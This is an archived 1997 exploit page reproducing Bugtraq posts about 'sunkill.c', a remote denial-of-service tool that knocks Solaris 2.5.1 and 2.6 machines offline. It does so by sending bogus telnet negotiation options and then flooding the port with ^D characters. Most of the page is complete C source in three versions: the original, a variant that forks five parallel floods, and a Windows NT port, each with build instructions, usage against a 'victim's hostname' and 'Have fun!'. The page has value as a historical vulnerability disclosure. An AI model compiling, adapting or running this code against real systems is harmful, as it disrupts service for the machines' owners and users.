Sun ^D DOS attack

Summary
Description:By connecting to the telnet port of a Solaris 2.5.1 box, sending some bogus telnet negotiation option and then flooding the channel with ^D, you can (temporarily) slow the machine to a near halt.
Author:Jason Zapman II <zapman@CC.GATECH.EDU>
Compromise:remote DOS attack
Vulnerable Systems:Solaris 2.5.1, 2.6
Date:13 December 1997
Notes:I appended a better version after the first (the second forks extra processes to increase the flood). I also appended an NT port.
Details


Date: Sat, 13 Dec 1997 15:48:51 -0500
From: Jason Zapman II <zapman@CC.GATECH.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: To kill a sun:

This is sunkill.c

It Affects at least solaris 2.5.1 machines, both sun4c and sun4m
achitecutures.  I imagine it affects all solaris 2.5.1 machines, both sparc
and x86, but im not sure.  It basically works by opening a telnet
connection on the victim machine and sends a few bad telnet negotiation
options, then flooods the port with lots of ^D characters.  This uses all
the streams memory (i think) on the victims machine and causes the kernel
to get very angry.  The machien crawls to a halt, the cursor in X stops
moving, the machine is unresponsive to the network.  Its a bad situation
all around.

/*
    **  To make, if your system is BSD'ish:  gcc <thisfile>
    **       ...if your system is SysV'ish:  gcc -lnsl -lsocket <thisfile>
    **
    **  Usage: a.out <victim's hostname>
    **
    **  Have fun!
    */

    #include <signal.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <arpa/telnet.h>
    #include <string.h>
    #include <unistd.h>

    #define BUFSIZE 100
    #define DOTS

    void catchit(void)
    {
        printf("\nCaught SIGPIPE -- your link may be too slow.\n");
        exit(1);
    }

    int main(int argc, char *argv[])
    {
        unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO,  \
        TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
        TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};

        unsigned char nastybuf[BUFSIZE];
        struct sockaddr_in sin;
        struct servent *sp;
        struct hostent *hp;
        int s;

        typedef void (*sig_t) (int);
        signal(SIGPIPE,(sig_t)catchit);

        memset(nastybuf,4,BUFSIZE);  /* ascii 4 = ^D */

        if (!(s = socket(AF_INET, SOCK_STREAM, 0))) {
              printf("no socket\n");
              exit(1);
        }

        if (!(hp = gethostbyname(argv[1]))) {
            printf("unknown host\n");
            exit(1);
        }

        bzero(&sin,sizeof(sin));
        bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
        sin.sin_family = AF_INET;
        sp = getservbyname("telnet","tcp");
        sin.sin_port = sp->s_port;

        if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
            printf("can't connect to host\n");
            exit(1);
        }

        printf("connected to %s\n",argv[1]);
        write(s,kludge_telopt,21);   /* kludge some telnet negotiation */

        /*  "Let them eat ^Ds..." */

        while (write(s,nastybuf,BUFSIZE) != -1) {

    #ifdef DOTS
            write(STDOUT_FILENO,".",1);
    #endif
        }
    }

Jason

--
     Jason Price    |     If you want to build a ship, don't drum up people
      Theta Xi,     |   together to collect wood and don't assign them tasks
   Beta, Alpha 449  | and work, but rather teach them to long for the endless
 jprice@poboxes.com |    immensity of the sea. -- Antoine de Saint Exupery
Date: Sun, 14 Dec 1997 14:27:27 -0600
From: Craig Johnston <caj@PRALINE.NO.NEOSOFT.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: To kill a sun:

On Sat, 13 Dec 1997, Jason Zapman II wrote:

> This is sunkill.c
>
> It Affects at least solaris 2.5.1 machines, both sun4c and sun4m
> achitecutures.  I imagine it affects all solaris 2.5.1 machines, both sparc
> and x86, but im not sure.  It basically works by opening a telnet
> connection on the victim machine and sends a few bad telnet negotiation
> options, then flooods the port with lots of ^D characters.  This uses all
> the streams memory (i think) on the victims machine and causes the kernel
> to get very angry.  The machien crawls to a halt, the cursor in X stops
> moving, the machine is unresponsive to the network.  Its a bad situation
> all around.

BTW, Sun is aware of this, but has neglected to do anything about it.
CERT has been made aware as well.  Both quite some time ago.  I guess
a no-login-needed, denial of service attack on any open telnet port
isn't very meaningful.

The telnet options are pretty standard, actually.

This code has killed all the way up to ultras running 2.5.1.

I've added a line that seems to make this do a lot better -- it
just runs 5 instances in parallel.  I've also tidied up a couple of
little things, they are the now-unquoted lines.

The affected machine will ping but good luck getting a login
prompt or doing anything much else on it.

Some machines seem to shrug it off, while on others it is
devestating.  With persistence, it seems to take out most of 'em sooner
or later.

The machine doesn't actually crash, it goes into deep hibernation.  Leave
it alone and it'll come back.

>
> /*
>     **  To make, if your system is BSD'ish:  gcc <thisfile>
>     **       ...if your system is SysV'ish:  gcc -lnsl -lsocket <thisfile>
>     **
>     **  Usage: a.out <victim's hostname>
>     **
>     **  Have fun!
>     */
>
>     #include <signal.h>
>     #include <sys/types.h>
>     #include <sys/socket.h>
>     #include <netinet/in.h>
>     #include <netdb.h>
>     #include <arpa/telnet.h>
>     #include <string.h>
>     #include <unistd.h>
>
>     #define BUFSIZE 100
>     #define DOTS
>
>     void catchit(void)
>     {
>         printf("\nCaught SIGPIPE -- your link may be too slow.\n");
>         exit(1);
>     }
>
>     int main(int argc, char *argv[])
>     {
>         unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO,  \
>         TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
>         TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};
>
>         unsigned char nastybuf[BUFSIZE];
>         struct sockaddr_in sin;
>         struct servent *sp;
>         struct hostent *hp;
>         int s;
>
          int child;
          for(child=4;child && fork();--child);  /* and then there were 5 */

>         typedef void (*sig_t) (int);
>         signal(SIGPIPE,(sig_t)catchit);
>
>         memset(nastybuf,4,BUFSIZE);  /* ascii 4 = ^D */
>
          if ((s = socket(AF_INET, SOCK_STREAM, 0))==-1) {
            perror("socket");
>           exit(1);
>           }
>
>         if (!(hp = gethostbyname(argv[1]))) {
            herror("gethostbyname");
>           exit(1);
>           }
>
>         bzero(&sin,sizeof(sin));
>         bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
>         sin.sin_family = AF_INET;
>         sp = getservbyname("telnet","tcp");
>         sin.sin_port = sp->s_port;
>
>         if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
              perror("connect");
>             exit(1);
>         }
>
>         printf("connected to %s\n",argv[1]);
>         write(s,kludge_telopt,21);   /* kludge some telnet negotiation */
>
>         /*  "Let them eat ^Ds..." */
>
>         while (write(s,nastybuf,BUFSIZE) != -1) {
>
>     #ifdef DOTS
>             write(STDOUT_FILENO,".",1);
>     #endif
>         }
>     }
>

--
Craig A. Johnston  /  Applications Engineer, NeoSoft, Inc.
caj@neosoft.com    /  ph: (504) 539-9235
Date: Sun, 14 Dec 1997 13:01:49 -0600
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Sun killer - NT port

>From an anonymous contributor. Should compile under UNIX as well.
---------- Forwarded message ----------
/*
    **  To make, if your system is BSD'ish:  gcc <thisfile>
    **       ...if your system is SysV'ish:  gcc -lnsl -lsocket <thisfile>
    **
    **  Usage: a.out <victim's hostname>
    **
    **  Have fun!
    */

#ifdef WIN32

#include <winsock.h>
#include <stdio.h>
/*NT doesn't have <arpa/telnet.h>
* so swipe the BSD header and stick it in your
* working dir*/
#include "telnet.h"

#else
    #include <signal.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <arpa/telnet.h>
    #include <string.h>
    #include <unistd.h>
#endif

#define BUFSIZE 100
#define DOTS

void catchit(void)
{
    printf("\nCaught SIGPIPE -- your link may be too slow.\n");
    exit(1);
}

#ifdef WIN32
void InitWinsock(void)
{
        WORD          VersionRequested;
        WSADATA       WsaData;

        VersionRequested = MAKEWORD(1, 1);
    if(WSAStartup(VersionRequested, &WsaData) != 0)
        {
                printf("Could not initialize Winsock\n");
                exit(-1);
        }
}
#endif

    int main(int argc, char *argv[])
    {
        unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO,  \
        TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
        TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};

        unsigned char nastybuf[BUFSIZE];
        struct sockaddr_in sin;
        struct servent *sp;
        struct hostent *hp;
        int s;

#ifndef WIN32
        typedef void (*sig_t) (int);
        signal(SIGPIPE,(sig_t)catchit);
#else
                InitWinsock();
#endif

        memset(nastybuf,4,BUFSIZE);  /* ascii 4 = ^D */

        if (!(s = socket(AF_INET, SOCK_STREAM, 0))) {
              printf("no socket\n");
              exit(1);
        }

        if (!(hp = gethostbyname(argv[1]))) {
            printf("unknown host\n");
            exit(1);
        }

        memset(&sin, 0, sizeof(sin));
        memcpy((char *)&sin.sin_addr, hp->h_addr, hp->h_length);
        sin.sin_family = AF_INET;
        sp = getservbyname("telnet","tcp");
        sin.sin_port = sp->s_port;

        if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
            printf("can't connect to host\n");
            exit(1);
        }

        printf("connected to %s\n", argv[1]);
        send(s, kludge_telopt, 21, 0);   /* kludge some telnet negotiation */

        /*  "Let them eat ^Ds..." */

        while (send(s, nastybuf, BUFSIZE, 0) != -1) {

    #ifdef DOTS
            putchar('.');
    #endif
        }
                return 0;
    }

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault